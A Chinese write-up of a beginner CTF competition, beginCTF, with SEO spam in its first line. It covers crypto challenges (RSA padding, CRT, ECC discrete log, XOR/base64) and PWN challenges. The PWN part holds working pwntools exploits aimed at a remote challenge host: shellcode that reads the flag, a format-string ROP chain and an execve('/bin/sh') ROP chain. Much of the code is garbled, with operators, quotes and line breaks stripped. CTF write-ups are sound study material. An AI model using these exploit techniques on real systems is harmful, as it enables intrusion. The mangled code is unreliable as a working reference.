安徽方圆建设有限公司网站,wordpress 连接丢失,网页与网站设计实验报告,wordpress主题更换字体教程 hu这个比赛没从开始弄#xff0c;也没弄到结束#xff0c;中间有点事出去4天#xff0c;回来后已经结束#xff0c;而且也下不了附件#xff0c;很遗憾。
虽然是新生赛#xff0c;但也挺难#xff0c;好些题都不会#xff0c;仅把一部分作了的记下来#xff0c;其它等等…这个比赛没从开始弄也没弄到结束中间有点事出去4天回来后已经结束而且也下不了附件很遗憾。
虽然是新生赛但也挺难好些题都不会仅把一部分作了的记下来其它等等看谁能弄到附件。 Crypto
PAD
有两个pad题都是绕过不需要技术解法只要找到特殊值就行。
import random, mathfrom Crypto.Util.number import *
from flag import flag
flagflag[:64]
assert len(flag) 64class RSA():def __init__(self, m: int):self.p, self.q, self.e, self.m getPrime(512), getPrime(512), getRandomRange(1,8), mself.n self.p * self.qdef Publickey(self):return (self.n, self.e,self.c)def Encrypt(self):pad PAD(mself.m, e0)pad.PAD()self.c (pad.e,pow(pad.M, self.e, self.n))
class PAD():def __init__(self, m: int, e):self.e, self.m, self.mbits e, m, m.bit_length()if e 0:self.e getRandomRange(2, 7)def PAD(self):self.M pow(self.e, self.mbits) pow(self.m, self.e)
GIFT bytes_to_long(flag)
with open(GIFT.txt, w) as f:for i in range(40):rsa RSA(mGIFT)rsa.Encrypt()f.write(str(rsa.Publickey()) \n)他作了两回RSA加密第1回用M e2**mbits m**e2 这其实并不是RSA他并没有取模可以直接开根号如果e2小的话。第2步是M**e1 mod n是比较标准的RSA但从给出的GIFT来看里边存在e11,e22的情况当e11时第2步被跳过第1步只需要开个平方即可。这里mbits需要猜一下不过不是512就是511也不大可能是别的。 M e2**mbits m**e2
c M**e1 %n
(n,e1,(e2,c))(n,e1,(e2,c)) (105489743033600776618404736924014082773234739025040235918547880079849719971737127359304073614094075884043630513694448370483208184306027684643273284267932051217742004175757404293643624264846421545917186078199365762796141089940330731024030929168374696605389962930325106070659194496163327222019090112724836643593, 1, (2, 26557762379124264922132214420209728936796452559751033517820166259647971200493029434772959145551662395540203237914969022639479368547265045300822940244603592956901947131088363115332681941180989239355596363143445708865429254462912210194997411474244175252940834791770566886483490068164580622099300335891131365129))
m2 c - 2**511
m iroot(m2,2)[0]
long_to_bytes(m)
#bbegin{8E6C79D2-E960-C57A-F3E4-A52BC827ED6B_Dragon_Year_happy!!!}
PAD_revenge
上一题的加强版虽然去掉了12的情况但是13的情况还不少直接crt即可
enc [
(4205338792881421548510609645647062608905484696099258750943039118994520455106270839395319116980996505132271552239717225130972438536887110724158402296232289, 1, (3, 590242556810530557883636062945321456666605165279521102134969558150863508014273375308372904949297413593224978273122299933502842450872249868557340596692448)),
(7050174313884434729593139368893291621548368062755985279847850232740992709140864927641348128276777490337461431355020263819014375471971053422267553276559149, 1, (3, 2893746834891731849952475353675823291920101887211621827992533553019484178344684430992593454765874180526901317935813716254980891868014768672217101779002964)),
(7695312868320303154724182556869744062740975850081486948529306458791551745279043014584922518803724721857725624240269226703220670466322322864253572576548333, 1, (3, 4853546005581242275031566639028865993927807758919394191424484984623935750674499388240409403735193793296025751636464209778684176500380928091202873126090673))
]
#c2c1
n [i[0] for i in enc]
c [i[2][1]-3**(64*8-1) for i in enc]
v crt(c,n)
m iroot(v,3)[0]
long_to_bytes(m)
bbegin{There_wonot_be_any_surprises_this_time230E03984617EEEEE13}fake_n
取15个小素数和p*q相乘作为fake_n真正的是fake_n去掉pq的部分说白点就是17个因子取15个作为n因为都是小因子可以直接分解然后爆破C 17 15即可
from Crypto.Util.number import *
from secret import flagdef fakeN_list():puzzle_list []for i in range(15):r getPrime(32)puzzle_list.append(r)p getPrime(32)q getPrime(32)com p*qpuzzle_list.append(com)return puzzle_listdef encrypt(m,e,fake_n_list):fake_n 1for i in range(len(fake_n_list)):fake_n * fake_n_list[i]really_n 1for i in range(len(fake_n_list)-1):really_n * fake_n_list[i]c pow(m,e,really_n)print(c ,c)print(fake_n ,fake_n)if __name__ __main__:m bytes_to_long(flag)e 65537fake_n_list fakeN_list()encrypt(m,e,fake_n_list)#使用17个因子中的15个为n
c 6451324417011540096371899193595274967584961629958072589442231753539333785715373417620914700292158431998640787575661170945478654203892533418902
fake_n 178981104694777551556050210788105224912858808489844293395656882292972328450647023459180992923023126555636398409062602947287270007964052060975137318172446309766581nlist [2215221821, 2290486867, 2333428577, 2361589081, 2446301969,2507934301, 2590663067, 3107210929, 3278987191, 3389689241,3417707929, 3429664037, 3716624207, 3859354699, 3965529989,4098704749, 4267348123]for i in range(len(nlist)-1):for j in range(i1,len(nlist)):phi 1 n fake_n // nlist[i] // nlist[j]for k in range(len(nlist)):if k!i and k!j:phi * nlist[k]-1m pow(c, inverse_mod(65537,phi),n)m long_to_bytes(int(m))if bbegin in m:print(m)#bbegin{y0u_f1nd_th3_re4l_n}
baby_classic
未完成
从题目上看就是一个矩阵乘和一个减两个密钥
C M*key1 key2
给了demo可以爆破这两个密钥但是key2是29**6这个有点大似乎爆破不出来。不清楚别人怎么弄的。有时间搜搜
from random import *
from string import *
import numpy as np
from secret import plaintextls ascii_uppercase _.*def generate_str(length):s for i in range(length):s choice(ls)return sdef str2mat(s):res np.zeros((len(s) // 6, 6),dtypeint)for i in range(0,len(s)):res[i // 6, i % 6] ls.index(s[i])return resdef mat2str(mat):s for i in range(len(mat) * 6):s ls[mat[i // 6, i % 6]]return sdef encrypt(plaintext,key1,key2):mat_plaintext str2mat(plaintext)mat_key1 str2mat(key1)mat_key2 str2mat(key2)enc_matrix np.dot(mat_plaintext,mat_key1) % 29for i in range(len(enc_matrix)):for j in range(len(enc_matrix[i])):enc_matrix[i][j] (enc_matrix[i][j] mat_key2[0][j]) % 29return mat2str(enc_matrix)if __name__ __main__:assert len(plaintext) 72m generate_str(48)key1 generate_str(36)key2 generate_str(6)c encrypt(m, key1, key2)ciphertext encrypt(plaintext, key1, key2)flag begin{ hashlib.md5(plaintext.encode()).hexdigest() }print(fm {m})print(fc {c})print(fciphertext {ciphertext})
output:
m VOWAS*TED.AE_UMLVFV*W*HSSSTZIZZZDAKCLXZKM_E*VR*Y
c QLOKQGUWMUTGZSDINCQVIVOLISFB_FC.IC_OSPLOBGOVSCZY
ciphertext MHDTBJSZXLHH.Z.VWGLXUV.SDQUPAMEPNVQVQZX_CBDZHM_IBZRGLJP_YSBDXN.VACLDGCO_hard_ECC
一道ECC的入门题除了给的是5参的曲线外没有特殊之处不过5参跟2参没什么区别。直接用PH方法
from flag import flagA [0,3,0,973467756888603754244984534697613606855346504624,864199516181393560796053875706729531134503137794]
p 992366950031561379255380016673152446250935173367
ec EllipticCurve(GF(p), [A[0], A[1], A[2], A[3], A[4]])
T ec.random_point()
secret int.from_bytes(flag, little)
Q T * secret
print(T, Q)
# (295622334572794306408950267006569138184895225554 : 739097242015870070426694048559637981600496920065 : 1)
# (282367703408904350779510132139045982196580800466 : 411950462764902930006129702137150443195710071159 : 1)
E EllipticCurve(GF(p), [A[0], A[1], A[2], A[3], A[4]])G E(295622334572794306408950267006569138184895225554,739097242015870070426694048559637981600496920065)
mG E(282367703408904350779510132139045982196580800466,411950462764902930006129702137150443195710071159)def PohligHellman(P,Q):E P.curve()factors, exponents zip(*factor(E.order()))primes [factors[i] ^ exponents[i] for i in range(len(factors))] dlogs []for fac in primes:t int(int(P.order()) // int(fac))dlog discrete_log(t*Q,t*P,operation)dlogs [dlog]#print(factor: str(fac), Discrete Log: str(dlog)) #calculates discrete logarithm for each prime orderprint(dlogs, primes) #当lm时不太多时,需要加模prod(primes)爆破l crt(dlogs,primes)return lm PohligHellman(G,mG)
#m 10910607047283133319639527186723699874555234
long_to_bytes(m)[::-1]
#bbegin{it_is_hard?}
OEIS2
去年的强网杯上有一题是求2^27!的数字和这个可以爆破也可以查表正解是查表。今天这个题用的是2^285由于多了个加5所以查不了表了。记得有一个博客说了个通过A*B来求乘后的数字和不过当时没看懂现在又找不到了。如果爆破的话需要大内存和长时间。没作。
baph
先base64再大小写互换然后异或key12字节96/8也就是MTP猜即可。本身头已经很长了第2段的ratulation还是比较明显的。
from base64 import b64encode
from Crypto.Util.number import *
from string import ascii_letters
from secrets import flagls ascii_letters !,.? {} 01232456789
assert all([i in ls for i in flag])
ba b64encode(flag.encode())
baph, key , for b in ba.decode():if b.islower():baph b.upper()key 0else:baph b.lower()key 1baph baph.encode()
key long_to_bytes(int(key, 2))
enc b
for i in range(len(baph)):enc long_to_bytes(baph[i] ^ key[i % len(key)])
f open(flag.enc, wb)
f.write(enc)
f.close()enc f72e1c66945c11828c1c9b61ce2e221eaa181dae8a49e279cf2d2966871c20a1bb1c977bf71b367eac1833bca749d81bce041c78ad5d09d4b45dcc67c90b3666975d11bca749c067cf2a2667941c27aab463d463f450367eaa2230aea75dc816enc f72e1c66945c11828c1c9b61ce2e221eaa181dae8a49e279cf2d2966871c20a1bb1c977bf71b367eac1833bca749d81bce041c78ad5d09d4b45dcc67c90b3666975d11bca749c067cf2a2667941c27aab463d463f450367eaa2230aea75dc816
enc bytes.fromhex(enc)b64code ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789/
ls ascii_letters !,.? {} 01232456789
f flag{C
k 100011010110for v in ls:head b64encode((fv)[:-3].encode()).decode()head .join([i.upper() if i.islower() else i.lower() for i in head]).encode()key xor(enc[:12], head.ljust(12,b\x00))tmp xor(enc,key).decode()tmp .join([i.upper() if i.islower() else i.lower() for i in tmp])tmp [tmp[i:i12] for i in range(0,96,12)]for row in tmp:if not all([1 if i in b64code else 0 for i in row[:9]]):breakelse:print(v,b .join([b64decode(row[:9]) for row in tmp]))a b64encode(bratulatio)
#bcmF0dWxhdGlv
b bCMf0DwXHDgLV
key xor(b, enc[12:24])
#b\x8dcD.\xeeoE\xe6\xce.\xae/
c xor(enc,key).decode()
#zMXHz3TdB25NCMf0DwXHDgLVBNmHiseGu29TzxrPBwvZigv4CgXVC2L2zsbHDhrHy2TZignHBIbIzsbLzMzLy3rPDMuHisf9
d .join([v.upper() if v.islower() else v.lower() for v in c])
#ZmxhZ3tDb25ncmF0dWxhdGlvbnMhISEgU29tZXRpbWVzIGV4cGxvc2l2ZSBhdHRhY2tzIGNhbiBiZSBlZmZlY3RpdmUhISF9
b64decode(d)
#bflag{Congratulations!!! Sometimes explosive attacks can be effective!!!}
flag{
ratu
ns!!
etim
plos
ttac
n be
ctivzMXHz3\x00\x00\x00\x00\x00\x00
CMf0Dw\x0c,\x06Uy\x18
BNmHis1#7\x00\x0c\x1a
zxrPBwUCz
CgXVC2\x18V8AW\x06
DhrHy2\x00U[\x06
BIbIzs6(8\x7fO\x02
y3rPDM!,ASwezcry
感觉可以解不过似乎第1步的运算量大了点
# sage
from random import randint
inti_Con [0x39a3f978106bac2d,0x2940e055f4a33725,0xfda9a7a293fb5bc9]
Con [[0x9c52c2de7a9373c4,0xf2135cb886d0fa21,0x957df7f3cd4879e9],[0xd54f837d2738d717,0x400ddf1ffaae436d,0xc2abb601d9a26b07],[0x1904359f1deb3495,0xc21aa09ba52b157b,0x3d45525db1b19a0c],[0xed66cf26a65afc73,0x1cee569b29ffa476,0x3da45abf4304849 ]
] C [[8 , -14, 7 ],[56 , -90, 35 ],[280, -434, 155]
]p 18446744073709551557
n 12297829382473034371 #invert(-3,p)def f(P:list, p:int, R:int, state 0):X [0 for i in range(3)]Y [0 for i in range(3)]# 第一轮前加常数for i in range(3):X[i] (P[i] inti_Con[i]) % p# R轮轮常数迭代for r in range(1,R1):for k in range(3):Y[k] (C[k][0] * pow(X[0], 3, p) C[k][1] * pow(X[1], n, p) C[k][2] * pow(X[2], 3, p) Con[(2*r-2) % 10][k]) % pfor k in range(3):X[k] (C[k][0] * pow(Y[0], n, p) C[k][1] * pow(Y[1], 3, p) C[k][2] * pow(Y[2], n, p) Con[(2*r-1) % 10][k]) % pif state :return Y else:return XP [randint(1,p), randint(1,p), 0]
assert f(P, p, 2, 0)[2] 0
assert f(P, p, 1, 1)[1] 1
flag flag{ str(P[0]) str(P[1]) }
print()
我玩清水的
c x^2 mod p
可以直接开根号
from Crypto.Util.number import *
from secret import flagm bytes_to_long(flag)
e 2
p getPrime(512)
c pow(m, e, p)print(fp {p})
print(fc {c})e 2
p 7709388356791362098686964537734555579863438117190798798028727762878684782880904322549856912344789781854618283939002621383390230228555920884200579836394161
c 5573755468949553624452023926839820294500672937008992680281196534187840615851844091682946567434189657243627735469507175898662317628420037437385814152733456P.x PolynomialRing(GF(p))
f x^2 - c
m f.roots()[(7709388356791362098686964537734555579863438117190798798028727762878684779964170612246233267488611287153408070230284965066669554779084616007946141375414580,1),(2916733710303623644856178494701210213708717656316720675449471304876254438460979581,1)]long_to_bytes(int(m[0][0]))
b\x932\xb4\x90\x88\x89X\t\xa4M\xaeUcK\xf0wH\xd5\xc1h\x11\xcc\n*\xecy\x17\xb3\x8dZI\xc9\x80|\xffxF|\n\xfc\x90\xf0h\xb2\x13{E1o(\xeb\x99\x7f\xac\xb0\xa0V%F$A4
long_to_bytes(int(m[1][0]))
bbegin{quadr4ticresidue_i5_s0_3asy}
begin_rsa
最后回到rsa上爆破pq的问题
from Crypto.Util.number import *
from gmpy2 import *
from secret import flag
m bytes_to_long(flag)while True:e 65537p1 getPrime(512)q1 getPrime(512)n1 p1 * q1p1_xor_q1_low (p1 ^ q1) ((1 402) - 1)if p1_xor_q1_low 10**121 and p1_xor_q1_low 10**122 - 1:p2 next_prime(p1_xor_q1_low)q2 int(str(p2)[61:] str(p2)[:61])n2 p2 * q2if isPrime(p2) and isPrime(q2):delta p2 - p1_xor_q1_lowc pow(m, e, n1)print(fdelta {delta})print(fn1 {n1})print(fn2 {n2})print(fc {c})break
delta 61
n1 150838784531830142890659431841610000561921043629625618437510373123377520444955469509903631548754842609295975005302780725591929018884805452687677684641162979092069629817740554095750189248769936750051172301891394503776919559958638203717583333429953061416588208428893436430392654983424277005324307321992921302331
n2 102603788692700558034198259394482879736866145355211103067657972779629890324418113112441175321034955422723378003769267804892308121194871227786783930178021669484220789624643889449429959522560822967157677629720685465873700893389751397027159036419
c 100199300622156732994823007073822662584719346985430234367094043002848132740563819931486477742264272832060136969084318984512567787814048659200236334994498141562184235841854521058494238451300610422156322926341430748222140189349893444976932184031798101999886029853099171189139509539715437105818418407563733036131第2部分爆破p2,q2其中 q2 int(str(p2)[61:]str(p2)[:61])就是10进制前后两半交换。
前后两半写作a,b列成竖式可以得到a*b的高位可以有进位需要减掉0-2和低位,把n的头和尾组合后得到a*b的值可能中间需要减进位本题恰好没有进位然后分解爆破a,b a b* b a
-----------------abh ablaah aalbbh bbl
abh abln[:60] n[60:121] ... n[-61:]
delta 61
n1 150838784531830142890659431841610000561921043629625618437510373123377520444955469509903631548754842609295975005302780725591929018884805452687677684641162979092069629817740554095750189248769936750051172301891394503776919559958638203717583333429953061416588208428893436430392654983424277005324307321992921302331
n2 102603788692700558034198259394482879736866145355211103067657972779629890324418113112441175321034955422723378003769267804892308121194871227786783930178021669484220789624643889449429959522560822967157677629720685465873700893389751397027159036419
c 100199300622156732994823007073822662584719346985430234367094043002848132740563819931486477742264272832060136969084318984512567787814048659200236334994498141562184235841854521058494238451300610422156322926341430748222140189349893444976932184031798101999886029853099171189139509539715437105818418407563733036131#q2 int(str(p2)[61:]str(p2)[:61])
#str(p2) 122
from Crypto.Util.number import *
sn str(n2)
abh,abl sn[:60],sn[-61:]tn int(str(int(abh)-0)abl)
divs divisors(tn)
for p in divs:q tn//p if len(str(p))61 and len(str(q))61:tp int(str(p)str(q).rjust(61,0))if n2%tp 0:print(tp)break p2 10046182803426524264884288617724249912105444610090073402734131021321139584526984358095762482718044064584704548733703637863
q2 10213211395845269843580957624827180440645847045487337036378631004618280342652426488428861772424991210544461009007340273413第2步给了 delta直接爆破p^q
#delta p2 - p1_xor_q1_low
p1_xor_ql_low p2 - 61
gift p2-61
N n1 def findp(p):llen(p)if l402:plist.append(int(p,2))else:ppint(p,2)qq(gift^^pp)%2**lif pp*qq%2**lN%2**l:findp(1p)findp(0p)plist[]
findp(1)for i in range(len(plist)):PR.x PolynomialRing(Zmod(N))f x*2^402 plist[i]f f.monic()r f.small_roots(X2^110, beta0.4)if r:p int(plist[i]r[0]* 2^402)if N%p 0:print(p)breakp 12135966078266804192771202403509952240758355261310452876061843129043333376845404452930133847901957978222586842893552580526457286703216006899609920950213431
q N//p
m pow(c, inverse_mod(65537,(p-1)*(q-1)),N)
flag long_to_bytes(int(m))
#bbegin{just_the_beginning_of_the_RSA}
PWN
one_byte
题目名字打开flag并输出1字节这题恰能溢出1字节覆盖到返回地址将返回地址改为循环每次从3读入1字节新打开的不使用只用3读则每次向后读1字节
int __cdecl main(int argc, const char **argv, const char **envp)
{char v4[8]; // [rsp7h] [rbp-9h] BYREFchar buf; // [rspFh] [rbp-1h] BYREFsetvbuf(stdin, 0LL, 2, 0LL);setvbuf(stdout, 0LL, 2, 0LL);setvbuf(stderr, 0LL, 2, 0LL);puts(Welcome to beginctf!);open(flag, 0);read(3, buf, 1uLL);printf(Here is your gift: %c\n, (unsigned int)buf);puts(Are you satisfied with the result?);read(0, v4, 0x12uLL);return 0;
}
from pwn import *context(archamd64, log_leveldebug)
#p process(./one_byte)
p remote(101.32.220.189, 31431)flag b
for i in range(80):p.recvuntil(bHere is your gift: )flag p.recv(1)p.sendafter(bAre you satisfied with the result?\n, b\x00*0x11 b\x4c)print(flag)#begin{oNe_8yT3_C0Uld_chAN6E_Th3_par7IAL_0verWR1T3_32705e5f93cb}mini_email 未完成
unhappy
读入shellcode然后执行但需要检查没有hapy
int __cdecl main(int argc, const char **argv, const char **envp)
{void *addr; // [rsp10h] [rbp-10h]addr mmap((void *)0xFFF00000LL, 0x1000uLL, 7, 34, -1, 0LL);if ( addr (void *)-1LL ){perror(mmap failed);return 1;}else{read(0, addr, 0x100uLL);check((__int64)addr);((void (*)(void))addr)();if ( munmap(addr, 0x1000uLL) -1 ){perror(munmap failed);return 1;}else{return 0;}}
}
通过很短的read来绕过检查再读入shellcode
from pwn import *context(archamd64, log_leveldebug)
#p process(./unhappy)
p remote(101.32.220.189, 30492)p.send(asm(shellcraft.read(0,0xfff00000,0x200)).ljust(0x100, b\x00))p.send(b\x90*0x20 asm(shellcraft.open(flag)shellcraft.read(3,0xfff00300,0x100)shellcraft.write(1,0xfff00300,0x100)))p.interactive()aladdin
格式化字符串不在栈内并且可绕过的限制了运行3次。 prctl(38, 1LL, 0LL, 0LL, 0LL);prctl(22, 2LL, v4);setbuf(stdin, 0LL);setbuf(stdout, 0LL);setbuf(stderr, 0LL);puts(Aladdins lamp will grant you three wishes);while ( --chance ){printf(your %d wish:\n, (unsigned int)chance);memset(wish, 0, sizeof(wish));read(0, wish, 0x100uLL);if ( strstr(wish, one more wish) ){puts(no way!);break;}printf(wish);}printf(The wonderful lamp is broken);return 0;
先利用19-49-17这个链清chance,再36-49-printfret这个链跳过while检查直接减1后运行得到负数便能得到无限次操作然后写ORW最后在返回地址写ppp4跳过链执行ORW
from pwn import *context(archamd64, log_leveldebug)
libc ELF(./libc.so.6)
elf ELF(./aladdin)#p process(./aladdin)
p remote(101.32.220.189, 31573)#gdb.attach(p, b*0x555555555425\nc)#p.sendafter(b:\n, .join([f%{i}$p\n for i in range(15,53)]).encode())#1,leak
p.sendafter(b:\n, f%19$p %17$p %15$p %49$p %51$p.encode())
stack int(p.recvuntil(b ),16) - 0x100
elf.address int(p.recvuntil(b ), 16) - 0x1229
chance elf.sym[chance]
pop_rbp elf.address 0x1213
leave_ret elf.address 0x1425libc.address int(p.recvuntil(b ), 16) - 0x29d90
pop_rdi libc.address 0x000000000002a3e5 # pop rdi ; ret
pop_rsi libc.address 0x000000000002be51 # pop rsi ; ret
pop_rdx libc.address 0x00000000000796a2 # pop rdx ; ret
pop_rax libc.address 0x0000000000045eb0 # pop rax ; ret
ppp6 libc.address 0x0000000000126ae0 # pop rcx ; pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; ret
ppp4 libc.address 0x000000000002a3de # pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
syscall libc.sym[getpid] 9print(f{libc.address :x} {elf.address :x} {stack :x})#2, 36-51-printfret 19-49-17
#printf - next chance-1
printf_ret stack - 0x60
p.sendafter(b:\n, f%{printf_ret0xffff}c%36$hn%{0x60}c%19$hn.encode())#3, 17-dance
p.sendafter(b:\n, f%{0x4a}c%52$hhn%{(chance-0x4a)0xffff}c%49$hn.encode())#4,
p.sendafter(b:\n, f%256c%17$hhn.encode())#19-49-rbp,ret
p.sendafter(b:\n, f%{(stack-0x18)0xff}c%19$hhn.encode())#rbp,ret wish0x10,leave_ret
for i,v in enumerate(p64(elf.sym[wish]0x10)[:6]):p.sendafter(b:\n, f%{(stack-0x18i)0xff}c%19$hhn.encode())p.sendafter(b:\n, f%{v}c%49$hhn.encode())for i,v in enumerate(p64(leave_ret)[:6]):p.sendafter(b:\n, f%{(stack-0x10i)0xff}c%19$hhn.encode())p.sendafter(b:\n, f%{v}c%49$hhn.encode())pay bone more wish.ljust(0x10, b\x00) b/flag.ljust(8, b\x00)
pay flat([pop_rdi,elf.sym[wish]0x10, pop_rsi,0, pop_rax,2, syscall,pop_rdi,3,pop_rsi,elf.sym[wish]0x100,pop_rdx,0x50, pop_rax,0, syscall,pop_rdi,1,pop_rax,1,syscall
])
p.sendafter(b:\n, pay)p.interactive()第1个链的远程和本地位置差1
ezheap 未完成
gift_rop
栈溢出题加了close(1)
int __cdecl main(int argc, const char **argv, const char **envp)
{char v4[32]; // [rsp0h] [rbp-20h] BYREFinit(argc, argv, envp);puts(Welcome to beginCTF!);puts(This is a fake(real) checkin problem.);read(0LL, v4, 512LL);close(1LL);close(2LL);return 0;
}
from pwn import *context(archamd64, log_leveldebug)
#p process(./gift_rop)
p remote(101.32.220.189, 32398)#gdb.attach(p, b*0x401887\nc)bin_sh 0x4c50f0
syscall 0x4149c6 #syscall;ret
pop_rdi 0x0000000000401f2f # pop rdi ; ret
pop_rsi 0x0000000000409f9e # pop rsi ; ret
pop_rdx 0x000000000047f20b # pop rdx ; pop rbx ; ret
pop_rax 0x0000000000448077 # pop rax ; ret
pop_rsp 0x000000000040238e # pop rsp ; retpay b\x00*0x28 flat(pop_rdi, bin_sh, pop_rsi, 0x4c5000, pop_rdx,0x4c5000,0, pop_rax, 59, syscall)
p.sendafter(bThis is a fake(real) checkin problem.\n, pay)sleep(0.2)
p.sendline(bexec 10)
p.sendline(bcat flag)
p.interactive()no_money
格式化字符串泄露并限制了$
这题不得不重新复习格式化字符串漏洞。在格式化时%作为标记后边的参数 n$注意是n$表示取第几个参数为指针后边hhn是写的字节数。所以当没有$时其实也可以直接用%p%p...来累加到使用的指针
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{int i; // [rspCh] [rbp-54h]char buf[72]; // [rsp10h] [rbp-50h] BYREFunsigned __int64 v5; // [rsp58h] [rbp-8h]v5 __readfsqword(0x28u);init(argc, argv, envp);puts(Welcome to beginCTF again!);puts(Im sorry to tell you that We dont have the funds.);puts(So I will not give you $.);while ( 1 ){puts(Your payload:);read(0, buf, 0x100uLL);for ( i 0; i 255; i ){if ( buf[i] $ )exit(-1);}printf(buf);check_target();}
}
ezpwn 未完成
后边还有题出来的晚。没看到
